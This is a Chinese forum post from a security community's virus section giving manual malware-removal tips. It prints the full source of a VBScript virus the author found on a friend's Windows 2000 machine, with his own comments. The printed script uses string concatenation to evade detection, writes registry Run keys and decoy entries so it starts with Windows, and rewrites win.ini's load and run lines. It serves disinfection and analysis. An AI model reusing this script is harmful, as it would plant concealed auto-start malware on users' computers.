20CN网络安全小组论坛 - 病毒专区 - 病毒手工查杀，个人建议。

论坛: 病毒专区标题: 病毒手工查杀，个人建议。

作者: moley [moley]

论坛用户

1）：任何时候，发现系统出现意外的出错，建议使用工具扫描进程！呵呵，我使用的是“优化大师”的进程管理，不是我偏心呀。

2）：发现可疑的进程，建议马上到网上搜索该文件，如果是已经出现过的病毒，那就恭喜你了。如果不是，你应该注意到该进程关闭后，爱机有什么不同哦？如果没有，我们可以试图删除，并查看注册表是否有标志该文件的启动项，有，则删！记住，删除的那个文件，不建议从回收站彻底删除。所有，一切完毕后，重新启动，呵呵，看看是不是还会发生机子问题哦。

3）：查看注册表，发现可以注册项目，可以顺着字符串值，到相应的目录删除该文件。当然，如果搜索不到该文件，请使用 DOS，输入dir/s <文件名>
attrib <文件名> -h -s -r
这样就可以把该文件的属性改变了，并可以删除了。

4）：记得前几天帮助一个朋友查杀这样的一个病毒，很不爽的是，该病毒在win2K注册表项目是：regedit -s C:\$NtUninstallQ887678$\WINSYS.cer，可是使用搜索就是无法找到“WINSYS.cer”这个文件，N火！后来，回到原始的DOS了，输入
D:\winnt>cd..
D:\>dir /s $NtUninstallQ887678$ 家伙，在呀！
D:\>attrib $NtUninstallQ887678$ -h -s -r
D:\cd $NtUnins~ 嘿嘿，家伙，还藏的很紧哦，TMD，谁做这样的病毒。
D:\$NtUninstallQ887678$>dir 哎，上帝呀，是一个脚本病毒文件WINSYS.vbs，呜，吐，狂吐！！！赶快了，这是人家的病毒呀，赶快来分析！
D:\$NtUninstallQ887678$>copy WINSYS.vbs D:\info.txt
呵呵，删咯。
D:\$NtUninstallQ887678$>del *.*
"Enter Y"
删你没商量！
好了，这样的代码，还是拿来分享吧！
CODE WINSYS.vbs for VBscript
<!--
Set sss = CreateObject("WSc" + "ript.Sh" + "ell")
mhk="HK"&"LM\SO"&"FTWARE\Mi"&"cr"&"os"&"oft\Win"&"dows\Cu"&"rren"&"tVersion\Run\"
mhc="H"&"K"&"CU\So"&"ft"&"ware\Mic"&"ros"&"oft\Win"&"dows\Curren"&"tVersion\Run\"
mhk2="HK"&"LM\SO"&"FT"&"WARE\M"&"icr"&"osoft\Wi"&"n"&"dows\Curren"&"tVersion\"
sss.RegWrite ""&mhk&"WlN32","regedit -s C:\$NtUninstallQ887678$\WINSYS.cer"
<!--他妈的，这段狂写注册表，好象真的太罗嗦和夸张哦！
sss.RegWrite ""&mhk&"internat.exe","internat.exe"
sss.RegWrite ""&mhk&"zwupdows","12"
sss.RegWrite ""&mhk&"win","12"
sss.RegWrite ""&mhk&"mwin","12"
sss.RegWrite ""&mhk&"internt","12"
sss.RegWrite ""&mhk&"Inernet","12"
sss.RegWrite ""&mhk&"Internet","12"
sss.RegWrite ""&mhk&"iexpleror","12"
sss.RegWrite ""&mhk&"zxdows","12"
sss.RegWrite ""&mhk&"qwe","12"
sss.RegWrite ""&mhk&"win1","12"
sss.RegWrite ""&mhk&"intelnat.exe","12"
sss.RegWrite ""&mhk&"u1888","12"
sss.RegWrite ""&mhk&"intenet","12"
sss.RegWrite ""&mhk&"9i5zxdows","12"
sss.RegWrite ""&mhk&"9i5com01zxdows","12"
sss.RegWrite ""&mhk&"99zxdows","12"
sss.RegWrite ""&mhk&"88zxdows","12"
sss.RegWrite ""&mhk&"Start Pagewin","12"
sss.RegWrite ""&mhk&"Start Page","12"
sss.RegWrite ""&mhk&"u188","12"
sss.RegWrite ""&mhk&"9i5comzxdows","12"
sss.RegWrite ""&mhk&"9q5zxdows","12"
sss.RegWrite ""&mhk&"u1881","12"
sss.RegWrite ""&mhk&"u1882","12"
sss.RegWrite ""&mhk&"u1883","12"
sss.RegWrite ""&mhk&"u1884","12"
sss.RegWrite ""&mhk&"u1885","12"
sss.RegWrite ""&mhk&"u1886","12"
sss.RegWrite ""&mhk&"u1887","12"
sss.RegWrite ""&mhk&"u88y", "12"
sss.RegWrite ""&mhk&"flash", "12"
sss.RegWrite ""&mhk&"999izxdows","12"
sss.RegWrite ""&mhk&"033zxdows","12"
sss.RegWrite ""&mhk&"syste","12"
sss.RegWrite ""&mhc&"my","12"
sss.RegWrite ""&mhk&"3zxdows","12"
sss.RegWrite ""&mhk&"88u88","12"
sss.RegWrite ""&mhk&"system","12"
sss.RegWrite ""&mhk&"8zxdows","12"
sss.RegWrite ""&mhk&"u18","12"
sss.RegWrite ""&mhk&"interneet.exe","12"
sss.RegWrite ""&mhk2&"RunOnce\", "12"
sss.RegWrite ""&mhk&"iexpler", "12"
sss.RegWrite ""&mhk&"u1810", "12"
sss.RegWrite ""&mhk&"winwin", "12"
sss.RegWrite ""&mhk&"WIN32", "12"
sss.RegWrite ""&mhk&"W1N32", "12"
<!--删除，刚才创建的多余键值！
sss.RegDelete ""&mhc&""
sss.RegDelete ""&mhk&"zwupdows"
sss.RegDelete ""&mhk&"win"
sss.RegDelete ""&mhk&"mwin"
sss.RegDelete ""&mhk&"internt"
sss.RegDelete ""&mhk&"inernet"
sss.RegDelete ""&mhk&"Internet"
sss.RegDelete ""&mhk&"u188"
sss.RegDelete ""&mhk&"iexpleror"
sss.RegDelete ""&mhk&"zxdows"
sss.RegDelete ""&mhk&"qwe"
sss.RegDelete ""&mhk&"win1"
sss.RegDelete ""&mhk&"intelnat.exe"
sss.RegDelete ""&mhk&"intenet"
sss.RegDelete ""&mhk&"9i5zxdows"
sss.RegDelete ""&mhk&"9i5com01zxdows"
sss.RegDelete ""&mhk&"99zxdows"
sss.RegDelete ""&mhk&"88zxdows"
sss.RegDelete ""&mhk&"Start Pagewin"
sss.RegDelete ""&mhk&"Start Page"
sss.RegDelete ""&mhk&"9i5comzxdows"
sss.RegDelete ""&mhk&"9q5zxdows"
sss.RegDelete ""&mhk&"999izxdows"
sss.RegDelete ""&mhk&"033zxdows"
sss.RegDelete ""&mhk&"u1881"
sss.RegDelete ""&mhk&"u1882"
sss.RegDelete ""&mhk&"u1883"
sss.RegDelete ""&mhk&"u1884"
sss.RegDelete ""&mhk&"u1885"
sss.RegDelete ""&mhk&"u1886"
sss.RegDelete ""&mhk&"u1887"
sss.RegDelete ""&mhk&"u88y"
sss.RegDelete ""&mhk&"flash"
sss.RegDelete ""&mhk&"88u88"
sss.RegDelete ""&mhk&"interneet.exe"
sss.RegDelete ""&mhk&"u18"
sss.RegDelete ""&mhk&"u1888"
sss.RegDelete ""&mhk&"system"
sss.RegDelete ""&mhk&"3zxdows"
sss.RegDelete ""&mhk&"8zxdows"
sss.RegDelete ""&mhk&"syste"
sss.RegDelete ""&mhk2&"RunOnce\"
sss.RegDelete ""&mhk&"iexpler"
sss.RegDelete ""&mhk&"u1810"
sss.RegDelete ""&mhk&"winwin"
sss.RegDelete ""&mhk&"WIN32"
sss.RegDelete ""&mhk&"W1N32"
<!--鸟的，注册表写的还不爽，还想看看WINOWS9X的win.in和system.ini，我也不想看太多，不想看他想干什么，反正太没“数值”了，还好这个人不大了解win2k的了,55555555！
Set FSO = CreateObject("Scrip" + "ting." + "FileSyst" + "emO" + "bject")
myfile14=FSO.FileExists("c:\wind" + "ows\W" + "IN.INI")
if myfile14 then
set FSO2=FSO.OpenTextFile("c:\win" + "dows\W" + "IN.INI")
mywin=FSO2.ReadALL()
l=Instr(mywin,"run=")-3
m=Instr(mywin,"load=")-1
n=Instr(mywin,"NullPort=")-3
FSO2.close
if l>0 and m>0 and l>m then
set FSO3=FSO.OpenTextFile("c:\wi" + "ndows\W" + "IN.INI")
mywin2=FSO3.Read(l)
FSO3.close
set FSO4=FSO.OpenTextFile("c:\win" + "dows\WI" + "N.INI")
mywin3=FSO4.Read(m)
FSO4.close
if n>0 and n>l then
set FSO5=FSO.OpenTextFile("c:\wind" + "ows\WIN" + ".INI")
mywin4=FSO5.Read(n)
FSO5.close
mywin=Replace(mywin,mywin4,"")
set FSO2=FSO.CreateTextFile("c:\win" + "dows\WI" + "N.INI")
FSO2.Write mywin3
FSO2.WriteLine "load="
FSO2.Write "run="
FSO2.Write mywin
FSO2.close
else
mywin=Replace(mywin,mywin2,"")
set FSO2=FSO.CreateTextFile("c:\win" + "dows\WI" + "N.INI")
FSO2.Write mywin3
FSO2.Write "load="
FSO2.Write mywin
FSO2.close
end if
end if
end if

当然，该程序也有应该佩服的地方，由于使用了"+"号，使的程序的更改性很强哦！

5）：好了，本人也很菜，就不多讲了，高手的不要见怪呀。可以的话，我们做个朋友，我的QQ:75314404，来自福建的。

[此贴被无泪剑客(moley) 在 10月20日20时52分编辑过]

地主发表时间: 10/20 20:02

论坛: 病毒专区